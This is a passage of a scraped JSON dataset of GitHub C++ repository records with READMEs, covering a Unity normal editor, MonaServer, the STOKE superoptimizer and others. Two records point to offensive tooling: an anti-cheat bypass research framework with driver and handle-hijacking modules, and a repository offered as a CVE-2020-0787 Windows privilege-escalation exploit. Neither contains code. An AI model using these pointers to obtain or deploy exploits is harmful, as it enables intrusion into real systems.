license, nor a free software license). Advanced warning.Everyone is nitpicking the licenses involved in this thread. Is this the right thing to do?It really bums me out that they didn\u2019t name it GANnamStyle.I worked with these guys at nvidia Helsinki office. They are super chill and just somehow crank out super research. Very interesting bunch.I know HN doesn't like hype, but as an AI neophyte, I find this incredible. Nvidia is doing it again. This is likely going to help with 3D generation, the next cornerstone. Imagine that we are solving the problems so fast.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "unity3d-jp/NormalPainter", "link": "https://github.com/unity3d-jp/NormalPainter", "tags": ["unity"], "stars": 659, "description": "vertex normal editor for Unity", "lang": "C++", "repo_lang": "", "readme": "", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MonaSolutions/MonaServer", "link": "https://github.com/MonaSolutions/MonaServer", "tags": [], "stars": 659, "description": "A lightweight RTMFP, RTMP, WebSocket and HTTP server!", "lang": "C++", "repo_lang": "", "readme": "MonaServer\n===========\n\n**MonaServer** is a new Web server born from the [Cumulus](https://github.com/OpenRTMFP/Cumulus) project.\n\nIn addition to **RTMFP** it includes **RTMP/RTMPE**, **WebSocket**, **HTTP**, a **NoDB** system and a lot of improvements.\n\nCheck our website to know more about **MonaServer** : www.monaserver.ovh\n\nYou can talk with the **MonaServer** Community on the [MonaServer forum](https://groups.google.com/forum/#!forum/monaserver) or report a bug on the [issues](https://github.com/MonaSolutions/MonaServer/issues) page.\n\nMonaServer is licensed under the [GNU General Public License], please contact us for a commercial licence at mathieupoux@gmail.com or jammetthomas@gmail.com.\n\nBinaries & Build\n------------------\n\nA [32-bit Windows zipped package](https://sourceforge.net/projects/monaserver/files/MonaServer_Win32.zip/download) is provided to quickly test MonaServer.\n\n**Note :** In order to use it you need the [C++ Redistributable Packages for Visual Studio 2013](http://www.microsoft.com/en-us/download/details.aspx?id=40784).\n\nWe recommend you to clone the github version from the sources and to follow the [Installation instructions](http://www.monaserver.ovh/installation.html) for production use.\n\n\nVersions\n-----------\n\nThe meanings of the differents types of branchs/tags are described here :\n\n| Branch | Description |\n| ------------- |------------------------------------------------------------------------------------|\n| master | Last version commited, using it is at your own risks (even if we test each commit) |\n| tags | Stable versions (latest one is 1.2) |\n\nDonations\n-------------\n\nYou can contribute to the project by making a donation : [$]|[\u20ac].\n\n[GNU General Public License]: http://www.gnu.org/licenses/ \"www.gnu.org/licenses\"\n[$]: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=VXMEGJ2MFVP4C \"Donation US\"\n[\u20ac]: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=LW2NA26CNLS6G \"Donation EU\"\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "niemand-sec/AntiCheat-Testing-Framework", "link": "https://github.com/niemand-sec/AntiCheat-Testing-Framework", "tags": ["reverse-engineering", "cheats", "cplusplus", "exploit", "kernel", "windows", "anti-cheats"], "stars": 658, "description": "Framework to test any Anti-Cheat", "lang": "C++", "repo_lang": "", "readme": "# AntiCheat-Testing-Framework\nFramework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. The entry level to reverse AntiCheats and Cheats is quite high, therefore, I'm realeasing all the code I developed during my research. The main idea is to help people and motive them to get into this topic which is really interesting and there is a lot to research about it.\n\nAll this code is the result of a research done for Recon2019 (Montreal) and BlackHat Europe 2019 (London). \n\nTwitter: [@Niemand_sec](https://twitter.com/niemand_sec)\n\nMore info: [Personal Blog](https://niemand.com.ar/)\n\n- **Description for each module can be found on each folder**.\n- Modules can be used together or separated. \n- Cuztomization should be simple due to the modularity of the code.\n\n# Usage\n\nMost of the settings can be done by using config.ini file, however, some modules may require particular settings on the code, depending on your intentions.\n\n> Remember to change location of config.ini file at CheatHelper/CheatHelper.cpp (variable configFile)\n\n# Modules (more coming in the future)\n\n- CheatHelper\n- DriverDisabler\n- DriverHelper\n- ExternalCheatDriver\n- DriverTester\n- HandleElevationDriver\n- HandleHijackingDLL\n- HandleHijackingMaster\n- LuaHook\n- StealthHijackingNormalDLL\n- StealthHijackingNormalMaster\n\n# About this Project\n\nAll this code is a result of the Researching presented at Recon 2019 and BlackHat Europe 2019: \"Unveiling the underground world of Anti-Cheats\"\n\nLinks: \n- First Release Info:\n - https://recon.cx/2019/montreal/\n - https://cfp.recon.cx/reconmtl2019/talk/MRJ3CN/\n- Second Release:\n - https://www.blackhat.com/eu-19/briefings/schedule/index.html#unveiling-the-underground-world-of-anti-cheats-17359\n \n \n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION", "link": "https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION", "tags": [], "stars": 658, "description": "Support ALL Windows Version", "lang": "C++", "repo_lang": "", "readme": "# CVE-2020-0787-EXP-ALL-WINDOWS-VERSION\n\n#### \u7533\u660e ####\n\n\u4f5c\u8005poc\u4ec5\u4f9b\u7814\u7a76\u76ee\u7684,\u5982\u679c\u8bfb\u8005\u5229\u7528\u672cpoc\u4ece\u4e8b\u5176\u4ed6\u884c\u4e3a,\u4e0e\u672c\u4eba\u65e0\u5173\n\n#### \u4ecb\u7ecd\nCVE-2020-0787-EXP Support ALL Windows Version\n\n![pic](https://ftp.bmp.ovh/imgs/2020/06/bcf797d23480bb10.png)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "StanfordPL/stoke", "link": "https://github.com/StanfordPL/stoke", "tags": [], "stars": 657, "description": "STOKE: A stochastic superoptimizer and program synthesizer", "lang": "C++", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/StanfordPL/stoke.svg?branch=develop)](https://travis-ci.org/StanfordPL/stoke)\n\nSTOKE\n=====\n\nSTOKE is a stochastic optimizer and program synthesizer for the x86-64 instruction set. STOKE uses random search to explore the extremely high-dimensional space of all possible program transformations. Although any one random transformation is unlikely to produce a code sequence that is desirable, the repeated application of millions of transformations is sufficient to produce novel and non-obvious code sequences. STOKE can be used in many different scenarios, such as optimizing code for performance or size, synthesizing an implementation from scratch or to trade accuracy of floating point computations for performance. As a superoptimizer, STOKE has been shown to outperform the code produced by general-purpose and domain-specific compilers, and in some cases expert hand-written code.\n\nIn addition to searching over programs, STOKE contains verification infrastructure to show the equivalence between x86-64 programs. STOKE can consider test-cases, perform bounded verification all the way to fully formal verification that shows the equivalence for all possible inputs.\n\nSTOKE has appeared in a number of publications. For a thorough introduction to\nthe design of STOKE, see:\n\n- [**Stochastic Superoptimization** -- ASPLOS 2013](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/asplos13.pdf)\n- [**Data-Driven Equivalence Checking** -- OOPSLA 2013](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/oopsla13b.pdf)\n- [**Stochastic Optimization of Floating-Point Programs with Tunable Precision** -- PLDI 2014](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/pldi14a.pdf)\n- [**Conditionally Correct Superoptimization** -- OOPSLA 2015](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/oopsla15a.pdf)\n- [**Stochastic Program Optimization** -- CACM 2016](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/cacm16.pdf)\n- [**Stratified Synthesis: Automatically Learning the x86-64 Instruction Set** -- PLDI 2016](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/pldi16.pdf)\n- [**Sound Loop Superoptimization for Google Native Client** -- ASPLOS 2017](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/asplos17.pdf)\n- [**A Complete Formal Semantics of x86-64 User-Level Instruction Set Architecture** -- PLDI 2019](https://raw.githubusercontent.com/StanfordPL/stoke/develop/docs/papers/pldi19a.pdf)\n\nAdditionally, the work [**Semantic Program Alignment for Equivalence Checking** (PLDI 2019)](https://github.com/bchurchill/pldi19-equivalence-checker/raw/master/pldi2019.pdf), was developed from this codebase. The [fork is available here](https://github.com/bchurchill/pldi19-equivalence-checker).\n\n\nStatus of this Work\n=====\n\nSTOKE isn't production ready. It's a research prototype that demonstrates the viability of superoptimization techniques in various domains. It's not a general-purpose tool. The papers above describe specific areas where successes have been shown beyond the state of the art: in optimizing straight line code, code where correctness can be relaxed (e.g. floating point), synthesizing sematic specifications for an instruction set, and in optimizing code containing loops with special compilation requirements (e.g. Google Native Client). We're not quite at the point where we can take a generic loop and expect to improve gcc/llvm -O3 code. In part, this is because these compilers have decades of work behind them to make them really great. \n\nAt this point, nobody is actively working on this code base. This repository now serves as an artifact for several of the above research papers. We will accept pull requests and answer inquiries as time permits.\n\n\nTable of Contents\n=====\n0. [Hardware Prerequisites](#hardware-prerequisites)\n1. [Using Docker](#using-docker)\n2. [Downloading and Building STOKE](#downloading-and-building-stoke)\n3. [Using STOKE](#using-stoke)\n 1. [Running Example](#running-example)\n 1. [Compiling and Disassembling Your Code](#compiling-and-disassembling-your-code)\n 1. [Test Case Generation](#test-case-generation)\n 1. [Final Configuration](#final-configuration)\n 1. [Starting STOKE](#starting-stoke)\n 1. [Rewriting the Binary](#rewriting-the-binary)\n 1. [Using the formal validator](#using-the-formal-validator)\n4. [Additional Features](#additional-features)\n5. [User FAQ](#user-faq)\n6. [Developer FAQ](#developer-faq)\n7. [Extending STOKE](#extending-stoke)\n 1. [Code Organization](#code-organization)\n 2. [Gadgets](#gadgets)\n 3. [Initial Search State](#initial-search-state)\n 4. [Search Transformations](#search-transformations)\n 5. [Cost Function](#cost-function)\n 6. [Live-out Error](#live-out-error)\n 7. [Verification Strategy](#verification-strategy)\n 8. [Command Line Args](#command-line-args)\n8. [Contact](#contact)\n\nHardware Prerequisites\n=====\n\nSTOKE will run on modern 64-bit x86 processors. It will run best on Haswell or\nnewer machines, but it can also run okay on Sandy Bridge. With Sandy Bridge\nprocessors, there won't be support for AVX2 instructions. \n\nIt should run on newer architectures, but we haven't tested it. However, stoke\nonly supports a subset of instructions that were widely available when it was\ninitially developed. As a result, targets generated by newer compilers might not\nwork with STOKE. (Adding support for an instruction mostly involves adding a\nspreadsheet entry in the x64asm project, and optionally adding validator support).\n\nUsing Docker\n=====\n\nSTOKE has many dependencies and we think the best way to get up-and-running\nwith a development environment is to use docker. Simply:\n\n $ sudo docker pull stanfordpl/stoke:latest\n\nThese docker images run an SSH server. We recommend starting the image like so:\n\n $ sudo docker run -d -P --name stoke stanfordpl/stoke:ARCH\n\nthen one can SSH as follows:\n\n $ sudo docker port stoke 22\n 0.0.0.0:XXXXX\n\n $ ssh -pXXXXX stoke@127.0.0.1\n (password is 'stoke')\n\n\n```\n./configure.sh\nmake\n```\n\nNote that there are other docker images from other travis-ci builds available\nin the stanfordpl/stoke-test repository. These should be available for recent\nbranches and pull requests, for example.\n\nYou can build your own docker images by running `docker build .` in\nthe top level of this repository. These are built upon the\n`stanfordpl/stoke-base:latest` image, which contains compiled versions of Z3\nand CVC4. If you want to upgrade Z3 or CVC4, it will require rebuilding these\nimsages. The `Dockerfile.base` dockerfile may be used for this purpose (but\nit's not part of continuous integration, so it may require some manual work to\nget it to happen).\n\nDownloading and Building STOKE\n=====\n\nSTOKE should work on Ubuntu 14.04 and Ubuntu 16.04. Regardless of\ndistribution, the key to making stoke right is using gcc version 4.9. Below\nthat, the compiler doesn't support enough features to build our code. Above\nthat, there are some issues with an ABI change in gcc-5.\n\n $ sudo apt-get install bison ccache cmake doxygen exuberant-ctags flex g++-4.9 g++-multilib gcc-4.9 ghc git libantlr3c-dev libboost-dev libboost-filesystem-dev libboost-thread-dev libcln-dev libghc-regex-compat-dev libghc-regex-tdfa-dev libghc-split-dev libjsoncpp-dev python subversion libiml-dev libgmp-dev libboost-regex-dev autoconf libtool antlr pccts pkg-config\n\nNote that your distribution might not have g++-4.9 by default. You may\nconsider installing a PPA as described here:\nhttps://askubuntu.com/questions/466651/how-do-i-use-the-latest-gcc-4-9-on-ubuntu-14-04\n\nThe rest of the dependencies will be fetched automatically as part of the build\nprocess.\n\nThe entire STOKE code base is available on GitHub under the Apache Software\nLicense version 2.0 at [github.com/StanfordPL/stoke](https://github.com/StanfordPL/stoke/). To check it out, type:\n\n $ git clone https://github.com/StanfordPL/stoke\n\nThis will check out the default `develop` branch. Unless you are looking for a\nspecific version or modification of STOKE, this is the branch to use. It\ncontains all the latest changes and is reasonably stable. This branch is\nsupposed to always pass all tests.\n\nSee the previous sections on how to download STOKE, a list of dependencies, and\nto check your hardware support level. The remainder of STOKE's software\ndependencies are available on GitHub and will be downloaded automatically the\nfirst time that STOKE is built. When you build STOKE the first time, run\n\n $ ./configure.sh\n\nThis will figure out the correct build parameters (such as the platform). To build STOKE, run\n\n $ make\n\nTo add STOKE and its related components to your path, type:\n\n $ export PATH=$PATH://bin\n\nTo run the tests, choose the appropriate command:\n\n $ make test\n\nThe files generated during the build process can be deleted by typing:\n\n $ make clean\n\nTo delete STOKE's dependencies as well (this is useful if an error occurs during the first build), type:\n\n $ make dist_clean\n\n\n\nUsing STOKE\n=====\n\nThe following toy example shows a typical workflow for using STOKE. All of the\nfollowing code can be found in the `examples/tutorial/` directory. As this\ncode is tested using our continuous integration system, the code there will\nalways be up-to-date, but this README can fall behind.\n\nRunning Example\n-----\n\nConsider a\nC++ program that repeatedly counts the number of bits (population count) in the\n64-bit representation of an integer. (Keeping track of a running sum prevents\n`g++` from eliminating the calls to `popcnt()` altogether.)\n\n```c++\n// main.cc\n\n#include \n#include \n#include \n\nusing namespace std;\n\nsize_t popcnt(uint64_t x) {\n int res = 0;\n for ( ; x > 0; x >>= 1 ) {\n res += x & 0x1ull;\n }\n return res;\n}\n\nint main(int argc, char** argv) {\n const auto itr = atoi(argv[1]);\n\n auto ret = 0;\n for ( auto i = 0; i < itr; ++i ) {\n ret += popcnt(i);\n }\n\n return ret;\n}\n```\n\nCompiling and Disassembling your Code\n-----\n\nSTOKE is a compiler and programming language agnostic optimization tool. It can\nbe applied to any x86-64 ELF binary. Although this example uses the GNU\ntoolchain, nothing prevents the use of other tools. To build this code with\nfull optimizations, type:\n\n $ g++ -std=c++11 -O3 -fno-inline main.cc\n \nNote that turning on optimizations (at least -O1) is helpful to remove unneeded stack operations, and gives STOKE a better program to start from. Usually, if using STOKE for optimization, starting with a better program often results in a better program. To measure runtime, type:\n\n $ time ./a.out 100000000\n \n real 0m1.046s\n user 0m1.047s\n sys 0m0.000s\n \nA profiler will reveal that the runtime of `./a.out` is dominated by calls to\nthe `popcnt()` function. STOKE can be used to improve the implementation of\nthis function as follows. The first step is to disassemble the program by\ntyping:\n\n $ stoke extract -i ./a.out -o bins\n \nThis will produce a directory named `bins` that contains the text of every\nfunction contained in the binary `./a.out`. \n\nHelp for stoke or any of its subcommands can be obtained by typing:\n\n $ stoke -h\n $ stoke -h\n \nSTOKE can accept arguments either through the command line or through a\nconfiguration file. The invocation of `stoke extract` shown above is equivalent\nto the following:\n\n $ stoke extract --config extract.conf\n \nWhere `extract.conf` contains:\n\n```\n##### stoke extract config file\n\n-i ./a.out # Path to the elf binary to disassemble\n-o bins # Path to the directory to store disassembled text in\n```\n\nEvery STOKE subcommand can be used to generate example configuration files by\ntyping:\n\n $ stoke --example_config \n\nBecause `main.cc` was compiled using `g++`, the text of the `popcnt()` function\nwill appear under the mangled name `_Z6popcntm` in `bins/_Z6popcntm.s`.\n\n```asm\n .text\n .globl _Z6popcntm\n .type _Z6popcntm, @function\n_Z6popcntm:\n xorl %eax,%eax\n testq %rdi,%rdi\n je .L_4005b0\n nop\n.L_4005a0:\n movq %rdi,%rdx\n andl $0x1,%edx\n addq %rdx,%rax\n shrq $0x1,%rdi\n jne .L_4005a0\n retq\n.L_4005b0:\n retq\n nop\n nop\n .size _Z6popcntm, .-_Z6popcntm\n```\n\nTest Case Generation\n-----\n\nThe next step is to generate a set of testcases for guiding STOKE's search\nprocedure. There are a few ways of genrating testcases:\n\n 1. Random generation + backtracking\n 2. Symbolic Execution + random search\n 3. Custom test case generator\n 4. Dynamically recording execution data from a sample program\n\nOption 1 is the easiest to start with, but can be limitted. It reliably works if there are no branches or instructions that trigger exceptions (like division). It tends to have trouble if the input code has both control flow branches and memory dereferences. To give this a try, one can run:\n\n`stoke testcase --target bins/_Z6popcntm.s --max_testcases 1024 -o popcnt.tc`\n\nIt will generate 1024 random test cases to standard output and save them in `popcnt.tc`. It will put random values in registers, and then try to fill in dereferenced memory locations with random values.\n\nOption 2 takes more compute time than option 1, and does well in different circumstances. It uses STOKE's formal verification tools to symbolically execute the code on paths up to a certain bound, generating a few test cases for each path. It uses random search to produce extra test cases beyond these. It's good for exercising corner cases in code. It tends to do poorly in cases where (i) a loop executes a fixed, large number of iterations, meaning there are no short paths through the program; (ii) where there's an exponential number of paths; and (iii) when there are a lot of memory dereferences and the bound is high. In the case of the tutorial, a bound of 64 is needed to exercise all the relevant program paths, but the tool handles this:\n\n`stoke_tcgen --target bins/_Z6popcntm.s --bound 64 --output popcnt.tc`\n\nOption 3 means writing code to generate your own test cases for your problem. This gives you the most versitility and can be used in almost any situation. Often you can use a combination of domain knowledge and randomness to create test cases that thoroughly explore paths through the program, especially paths involving long-running loops. Combining option 3 and option 2 is often a powerful combination. For an example of this, see the code in `tools/apps/tcgen_tsvc.cc` in the `ddec-diophantine` branch. This code generates random test cases for a particular set of benchmarks that need arrays of fixed length and some static read-only data.\n\nLastly, option 4, dynamic instrumentation of a program, offers the flexibility of option 3 and (ideally) is easier to use. Right now, unfortunately, the tools are a bit buggy (see #971). When the tool is working, these can be obtained by typing:\n\n $ stoke testcase --config testcase.conf\n \nwhere `testcase.conf` contains:\n\n```\n##### stoke testcase config file\n\n--bin ./a.out # The name of the binary to use to generate testcases \n--args 10000000 # Command line arguments that should be passed to ./a.out\n--functions bins # Disassembly directory created by stoke extract\n\n-o tcs/_Z6popcntm # Path to file to write testcases to\n\n--fxn _Z6popcntm # The name of the function to generate testcases for\n--max_testcases 1024 # The maximum number of testcases to generate. \n```\n\nThe resulting file will contain 1024 entires, all of the form:\n\n```\nTestcase 0:\n\n%rax 00 00 00 00 00 98 96 80\n%rcx 00 00 00 00 00 00 00 00\n%rdx 00 00 00 00 00 00 00 0a\n%rbx 00 00 00 00 00 00 00 01\n%rsp 00 00 7f ff 97 44 36 28\n%rbp 00 00 00 00 00 00 00 00\n%rsi 19 99 99 99 99 99 99 99\n%rdi 00 00 00 00 00 00 00 00\n%r8 00 00 2a c9 68 1a 50 40\n%r9 00 00 7f ff 97 44 46 01\n%r10 00 00 00 00 00 98 96 80\n%r11 00 00 00 00 00 00 00 0a\n%r12 00 00 00 00 00 98 96 80\n%r13 00 00 7f ff 97 44 37 20\n%r14 00 00 00 00 00 00 00 00\n%r15 00 00 00 00 00 00 00 00\n\n%ymm0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00\n%ymm1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f 2f\n%ymm2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 00 00 00 00 ff\n%ymm4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n%ymm15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n\n%cf 0 \n%1 1 \n%pf 1 \n%0 0 \n%af 0 \n%0 0 \n%zf 0 \n%sf 0 \n%tf 0 \n%if 1 \n%df 0 \n%of 0 \n%iopl[0] 0 \n%iopl[1] 0 \n%nt 0 \n%0 0 \n%rf 0 \n%vm 0 \n%ac 0 \n%vif 0 \n%vip 0 \n%id 0 \n\n[ 00007fff 97443630 - 00007fff 97443620 ]\n[ 1 valid rows shown ]\n\n00007fff 97443628 d d d d d d d d 00 00 00 00 00 40 04 6c\n\n[ 00000000 00000000 - 00000000 00000000 ]\n[ 0 valid rows shown ]\n\n[ 00000000 00000000 - 00000000 00000000 ]\n[ 0 valid rows shown ]\n\n0 more segment(s)\n```\n\nEach entry corresponds to the hardware state that was observed just prior to an\nexecution of the `popcnt()` function. The first 60 rows represent the contents\nof general purpose, sse, and eflags registers, and the remaining rows represent\nthe contents of memory, both on the stack and the heap. Memory is shown eight\nbytes at a time, where a block of eight bytes appears only if the target\ndereferenced at least one of those bytes. Each row contains values and state\nflags. Bytes are flagged as either (v)alid (the target dereferenced this byte),\n or (.)invalid (the target did not dereference this byte). \n\nFinal Configuration\n-----\n\nEach of the random transformations performed by STOKE are evaluated with\nrespect to the contents of this file. Rewrites are compiled into a sandbox and\nexecuted beginning from the machine state represented by each entry. Rewrites\nare only permitted to dereference defined locations. This includes registers\nthat are flagged as `def_in` (see `synthesize.conf`, below), memory locations that\nare flagged as 'v', or locations that were written previously. Rewrites are\npermitted to write values to all registers and to any memory location that is\nflagged as valid. \n\nSTOKE will produce optimal code that works on the testcases. The testcases\nneed to be selected to help ensure that STOKE doesn't produce an incorrect\nrewrite. In our main.cc file in `examples/tutorial` we choose arguments to the\n`popcnt` function to make sure that it sometimes provides arguments that use\nmore than 32 bits. Otherwise, STOKE will sometimes produce a rewrite using the\n`popcntl` instruction, which only operates on the bottom half of the register,\ninstead of the `popcntq` instruction, which operates on the whole thing.\n Alternatively you can use the formal validator in bounded mode with a large\n bound (over 32). This large bound is tractable because this example doesn't\n has a small number of cases for memory aliasing (namely, none at all!). If a\n counterexample is found it can be automatically added to the search so STOKE\n won't make this mistake again.\n\nThe STOKE sandbox will safely halt the execution of rewrites that perform\nundefined behavior. This includes leaving registers in a state that violates\nthe x86-64 callee-save ABI, dereferencing invalid memory, performing a\ncomputation that results in a floating-point exception, or becoming trapped in\na loop that performs more than `max_jumps` (see `synthesize.conf`, below). \n\nStarting STOKE\n-----\n\nThe final step is to use these testcases and the target code contained in\n`bins/_Z6popcntm.s` to run STOKE search in synthesis mode (i.e., trying to find a program starting from the empty program) by typing:\n\n $ stoke synthesize --config synthesize.conf\n \nwhere `synthesize.conf` contains:\n\n```\n##### stoke search config file\n\n--out result.s # Path to write results to\n\n--target bins/_Z6popcntm.s # Path to the function to optimize\n\n--def_in \"{ %rdi }\" # The registers that are defined on entry to the target\n--live_out \"{ %rax }\" # The registers that are live on exit from the target\n\n--testcases popcnt.tc # Path to testcase file\n--training_set \"{ 0 ... 7 }\" # Testcases to use for measuring correctness during search\n--test_set \"{ 8 ... 1023 }\" # Testcases to use as holdout set for checking correctness\n\n--distance hamming # Metric for measuring error between live-outs\n--misalign_penalty 1 # Penalty for results that appear in the wrong location\n--reduction sum # Method for summing errors across testcases\n--sig_penalty 9999 # Score to assign to rewrites that produce non-zero signals\n\n--cost \"correctness + latency\" # Measure performance by summing instruction latencies\n\n--global_swap_mass 0 # Proposal mass\n--instruction_mass 1 # Proposal mass\n--local_swap_mass 1 # Proposal mass\n--opcode_mass 1 # Proposal mass\n--operand_mass 1 # Proposal mass\n--rotate_mass 0 # Proposal mass\n\n--beta 1 # Search annealing constant\n--initial_instruction_number 5 # The number of nops to start with\n\n--statistics_interval 100000 # Print statistics every 100k proposals\n--timeout_iterations 16000000 # Propose 16m modifications total before giving up\n--cycle_timeout 1000000 # Try 1m modifications before restarting\n\n--strategy hold_out # Verify results using a larger hold out testcase set\n```\n\nSTOKE search will produce two types of status messages. Progress update\nmessages will be printed whenever STOKE discovers a new lowest cost verified or\nunverified rewrite. The code shown on the left is not equivalent to the target\ncode; the code shown on the right is with respect to the current set of\ntestcases.\n\n```\nProgress Update: \n\nLowest Cost Discovered (9) Lowest Known Correct Cost (15) \n \nbtrq $0xffffffffffffffc0, %rdi testq %rdi, %rdi \nretq je .L_X64ASM_0 \n xorl %eax, %eax \n .L_X64ASM_1: \n movl %edi, %edx \n andl $0x1, %edx \n addl %edx, %eax \n shrq $0x1, %rdi \n jne .L_X64ASM_1 \n cltq \n retq \n .L_X64ASM_0: \n xorl %eax, %eax \n retq\n```\n\nStatistics updates will be printed every `statistics_interval` proposals.\nStatistics are shown for the number of proposals that have taken place, elapsed\ntime, proposal throughput, and for each of the transformations specified to\nhave non-zero mass in `synthesize.conf`.\n\n```\nStatistics Update: \n\nIterations: 100000\nElapsed Time: 0.0836948s\nIterations/s: 1.19482e+06\n\nMove Type Proposed Succeeded Accepted \n \nInstruction 16.791% 5.83% 2.009% \nOpcode 16.646% 8.857% 4.013% \nOperand 16.593% 10.444% 6.864% \nRotate 16.611% 0.791% 0.789% \nLocal Swap 16.597% 1.556% 1.128% \nGlobal Swap 16.762% 7.066% 6.08% \nExtension 0% 0% 0%\n\nTotal 100% 34.544% 20.883%\n```\n\nWhen search has run to completion, STOKE will write the lowest cost verified\nrewrite that it discovered to `result.s`. Because this is a particularly simple\nexample, STOKE is almost guaranteed to produce the optimal rewrite:\n\n```asm\n .text\n .globl _Z6popcntm\n .type _Z6popcntm @function\n_Z6popcntm:\n popcnt %rdi, %rax\n retq\n .size _Z6popcntm, .-_Z6popcntm\n```\n\nRewriting the Binary\n-----\n\nThis result can then be patched back into the original binary by typing:\n\n $ stoke replace --config replace.conf\n \nwhere `result.conf` contains:\n\n```\n##### stoke replace config file\n\n-i ./a.out # Path to the elf binary to patch\n--rewrite result.s # Path to the replacement function\n```\n\nAnd runtime can once again be measured by typing:\n\n $ time ./a.out 100000000\n \n real 0m0.133s\n user 0m0.109s\n sys 0m0.000s \n\nAs expected, the results are close to an order of magnitude faster than the original.\n\nUsing the Formal Validator\n-----\n\nSTOKE includes a formal validator. It's design and interface\nare detailed in the `src/validator/README.md` file. To use the formal\nvalidator instead of hold out testing, specify `--strategy bounded` for any\nSTOKE binary that you use. For code with loops, all paths will be explored up\nto a certain depth, specified using the --bound argument, which defaults to 2. There's also `--strategy ddec` which attempts to run the data-driven equivalence checking algorithm; however, the current implementation isn't very robust -- please file bug reports with (target, rewrite) pairs that fail to validate but should.\n\nThe bounded validator can be used to verify the example, but it takes a little while! One can run `make check` to do a fast check or `stoke debug verify --def_in \"{ %rax %rdi }\" --live_out \"{ %rax }\" --target bins/_Z6popcntm.s --rewrite result.s --abi_check --strategy bounded --bound 64` to do a complete proof of equivalence. The faster check uses a bound of 8. Roughly speaking, this checks that the rewrite is correct when the input value is only 8 bits in size. Increasing the boundwill check more cases, and when the bound is 64 it will check all of them, but running time is exponential in the bound.\n\nAnother example of using the validator can be found in the `examples/pairity`\nfolder; this example has a Makefile much like the tutorial's and should be easy\nto follow. The key difference is that the pairity example does not use\ntestcases to guide search. Instead, after producing a candidate rewrite, the\nvalidator checks for equivalence. If the codes are not equivalent, a\ncounterexample is found, and this is used as a new testcase to help guide\nsearch.\n\nThere are some important limitations to keep in mind while using the validator:\n\n- Only some instructions are supported. The `--validator_must_support` flag\ncan be used to only propose instructions that can be validated.\n- Only the general purpose registers, SSE registers (`ymm0`-`ymm15`) and five of\nthe status flags (`CF`, `SF`, `PF`, `ZF`, `OF`) are supported.\n- Memory is now fully supported, even in the presence of complex aliasing.\n\n\nAdditional Features\n=====\n\nIn addition to the subcommands described above, STOKE has facilities for\ndebugging and benchmarking the performance of each of its core components. See `stoke --help` for an up-to-date list.\n\n- `stoke debug cfg`: Generate a pdf of a control flow graph.\n- `stoke debug cost`: Compute the cost of a rewrite.\n- `stoke debug diff`: Diff the resulting state of two functions.\n- `stoke debug effect`: Show the effect of a function on the state.\n- `stoke debug formula`: Show the SMT formula for a straight-line piece of code.\n- `stoke debug sandbox`: Step through the execution of a rewrite.\n- `stoke debug search`: View the changes produced by performing and undoing a program transformation.\n- `stoke debug simplify`: Take an x86 program and simplify it (by removing redundant instructions).\n- `stoke debug state`: Check the behavior of operators that manipulate hardware machine states.\n- `stoke debug tunit`: Show the instruction sizes and RIP-offsets for a code.\n- `stoke debug verify`: Check the equivalence of two programs.\n- `stoke benchmark 